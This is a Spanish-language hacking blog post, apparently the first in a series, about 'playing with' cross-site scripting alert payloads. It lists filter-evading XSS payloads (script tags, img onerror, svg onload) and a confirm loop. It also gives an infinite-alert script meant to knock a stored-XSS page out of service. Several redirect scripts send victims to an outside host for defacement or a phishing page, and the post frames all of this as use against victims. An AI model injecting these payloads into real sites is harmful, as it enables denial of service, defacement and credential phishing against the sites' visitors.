Cross Site Scripting | Jugando - Parte 1

Jugando con los Alert()



Ya en otras ocasiones hemos visto la función básica de la vulnerabilidad XSS, desde como se busca, identifica y explota utilizando un sencillo script o payload, con el fin de hacer que el sitio nos muestre una alerta. Para lograr eso, existe infinidad de payloads, que nos permiten vurlar los WAF, los filtros anti-XSS, etc.

Lo que conocemos normalmente es: <script>alert("XSS")</script>.
De este script, nacen mas con el fin de poder burlar filtros, saltarnos etiquetas html, etc. Por ejemplo tenemos estos:

<script>alert("XSS")</script>

"><script>alert('XSS')</script>
'"><script>alert(/XSS/)</script>
"><b><script>alert(/xss/)</script></b>
<img src="x" onerror="alert(1)"">
'"><svg/onload=alert(/XSSPOSED/)>

Y un sin fin mas, de payloads. Sin embargo podemos jugar con los alert, aprovechándonos de la programación javascript y teniendo un poco de imaginacion (xD).

Por ejemplo, podemos utilizar un windows confirm.

<script>function redBIRD() { if (confirm("Selecciona OK")) { alert("RedBirdTeam"); }else { alert("No le diste al OK"); } redBIRD(); } redBIRD(); </script>



Jugando un poco, con una victima o con el XSS. Pero aun podemos ir mas lejos, podemos hacer que los alert, sean "infinitos":

"><script>for (;;) alert("Hacked by.Drok3r")</script>

Defacement & Phishing

Este tipo de script, suele dejar "fuera de servicio" una aplicacion web, que contiene un XSS almacenado, pero gracias a las a nuestros navegadores como lo son Firefox o Chrome, podemos evitar este tipo de ataques.

También podemos llegar a un Defacement con el XSS, sin embargo tiene sus ventajas y desventajas, una de ellas, es que si la vulnerabilidad es reflejada, solo afectara a quien acceda al enlace con el payload, pero si es un xss almacenado, si afecta a cualquiera que acceda a la pagina. Tanto podemos afectar al usuario con un Defacement, podemos redireccionarlo a un phishing del mismo sitio.

Para eso podemos utilizar ya sea que busquemos un defacement o redireccionar a un phishing:

<script> document.location.href = "http://redbird.com/deface.php"; </script>
<script> window.location= "http://
redbird.com/deface.php"; </script> 
<script> location.assign(""http://
redbird.com/deface.php""); </script>
<script> location.replace("http://
redbird.com/deface.php"); </script>

EJEMPLO:

El ejemplo de arriba, redirecciona a una imagen que dice hacked.








Publicar un comentario

0 Comentarios

Slider Parnert

Subscribe Text

¿Quieres estar al día con noticias?